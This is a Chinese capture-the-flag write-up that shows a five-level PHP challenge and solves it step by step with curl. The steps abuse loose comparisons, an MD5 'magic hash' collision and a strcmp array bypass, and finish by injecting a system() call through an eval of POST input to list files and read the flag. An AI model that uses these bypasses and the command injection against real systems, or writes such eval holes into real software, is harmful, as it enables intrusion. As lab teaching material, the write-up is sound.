题目

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
 <?php
error_reporting(0);
highlight_file(__FILE__);
include "passwd.php";
// 判断GET请求中是否存在L1参数。
if(isset($_GET['L1'])) {
    $L1 = $_GET['L1'];
    // 这里是 1 级。
    echo "Here is level1.<br />";
    // 判断$L1变量是否是数字。如果是就结束后面代码。
    is_numeric($L1) ? die("nonono!") : NULL;
    // 判断$L1变量是否大于2021。注意:这里的判断和上面的代码出现冲突。
    if ($L1 > 2021) {
        // 恭喜,你通过了level1!
        echo "Congratulations,You pass the level1!<br />";
        // 这里是2级。
        echo "Here is level2.<br />";
        // 判断GET请求中是否存在L2参数。
        if(isset($_GET['L2']))
            $L2=$_GET['L2'];
        // 判断$L2变量是否小<=3并且$L2变量>20000。注意:这里是存在矛盾判断。
        if (strlen($L2) <= 3 && $L2 > 20000) {
            // 恭喜,你通过了level2!
            echo "Congratulations,You pass the level2!<br />";
            // 这里是3级。
            echo "Here is level3.<br />";
            // 判断GET请求中是否存在L3参数。
            if (isset($_GET['L3']))
                $md5_1 = md5('QNKCDZO');
            $md5_2 = md5($_GET['L3']);
            // 判断$md5_1的md5值是否等于$md5_2的md5值。
            if ($md5_1 == $md5_2) {
                // 恭喜,你通过了3级!
                echo "Congratulations,You pass the level3!<br />";
                // 这里是 4 级。
                echo "Here is level 4.<br />";
                // 判断GET请求中是否存在L4参数。
                if (isset($_GET['L4']))
                $level_4 = $_GET['L4'];
                // 你不知道我的密码
                // You can't know my password
                    // $level_4变量的值 == $level_4_password变量的值。
                    if (strcmp($level_4, $level_4_password) == 0) {
                        // 密码对了,你通过了4级! 
                        echo "Password is right,You pass the level4!<br />";
                        // 这里是 5 级。
                        echo "Here is level5.<br />";
                        // 判断POST请求中是否存在L5参数。
                        if (isset($_POST['L5'])) {
                            $level_5 = $_POST['L5'];
                            // 将$level_5变量的值进行拼接。
                            eval("print_r($level_5);");
                        }
                    } else {
                        die("Sorry, you didn't pass the level4!");
                    }
            } else {
                die("Sorry, you didn't pass the level3!");
            }
        } else {
            die("Sorry, you didn't pass the level2!");
        }
    }
    else {
        die("Sorry, you didn't pass the level1!");
    }
}

测试

  • L1参数存在弱类型判断。
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/桌面]
└─$ curl "http://你的靶机ID.ctf.nynusec.com/?L1=2022A"
...
Here is level1.
Congratulations,You pass the level1!
Here is level2.
Sorry, you didn't pass the level2!
  • L2参数存在弱类型判断。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# 使用1e9。
┌──(kali㉿kali)-[~/桌面]
└─$ curl "http://你的靶机ID.ctf.nynusec.com/?L1=2022A&L2=1e9"
Here is level1.
Congratulations,You pass the level1!
Here is level2.
Congratulations,You pass the level2!
Here is level3.
Sorry, you didn't pass the level3!

# 使用数组。
┌──(kali㉿kali)-[~/桌面]
└─$ curl "http://你的靶机ID.ctf.nynusec.com/?L1=2022A&L2[]=123&L2[]=99999"
Here is level1.
Congratulations,You pass the level1!
Here is level2.
Congratulations,You pass the level2!
Here is level3.
Sorry, you didn't pass the level3!
  • L3也是存在弱类型判断,使用md5碰撞绕过。
1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/桌面]
└─$ curl "http://你的靶机ID.ctf.nynusec.com/?L1=2022A&L2[]=123&L2[]=99999&L3=240610708"
Here is level1.
Congratulations,You pass the level1!
Here is level2.
Congratulations,You pass the level2!
Here is level3.
Congratulations,You pass the level3!
Here is level 4.
Sorry, you didn't pass the level4!
  • L4使用数组方式绕过。
1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/桌面]
└─$ curl "http://你的靶机ID.ctf.nynusec.com/?L1=2022A&L2[]=123&L2[]=99999&L3=240610708&L4[]="
Here is level1.
Congratulations,You pass the level1!
Here is level2.
Congratulations,You pass the level2!
Here is level3.
Congratulations,You pass the level3!
Here is level 4.
Password is right,You pass the level4!
Here is level5.
  • L5使用字符拼接方式获取flag。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# 查看的前目录存在什么文件。
┌──(kali㉿kali)-[~/桌面]
└─$ curl -d "L5='');system('ls -l'" "http://你的靶机ID.ctf.nynusec.com/?L1=2022A&L2[]=123&L2[]=99999&L3=240610708&L4[]=" 
Here is level1.
Congratulations,You pass the level1!
Here is level2.
Congratulations,You pass the level2!
Here is level3.
Congratulations,You pass the level3!
Here is level 4.
Password is right,You pass the level4!
Here is level5.
total 12
-rw-r--r-- 1 root root   55 Aug 24 15:43 flag.php
-rw-r--r-- 1 root root 1693 Nov  2  2021 index.php
-rw-r--r-- 1 root root   57 Nov  2  2021 passwd.php

# 读取flag.php文件的内容。
┌──(kali㉿kali)-[~/桌面]
└─$ curl -d "L5='');system('cat flag.php'" "http://你的靶机ID.ctf.nynusec.com/?L1=2022A&L2[]=123&L2[]=99999&L3=240610708&L4[]="
Here is level1.
Congratulations,You pass the level1!
Here is level2.
Congratulations,You pass the level2!
Here is level3.
Congratulations,You pass the level3!
Here is level 4.
Password is right,You pass the level4!
Here is level5.
<?php
$flag=flag{ce804e21-****-****-****-2675a90ace92};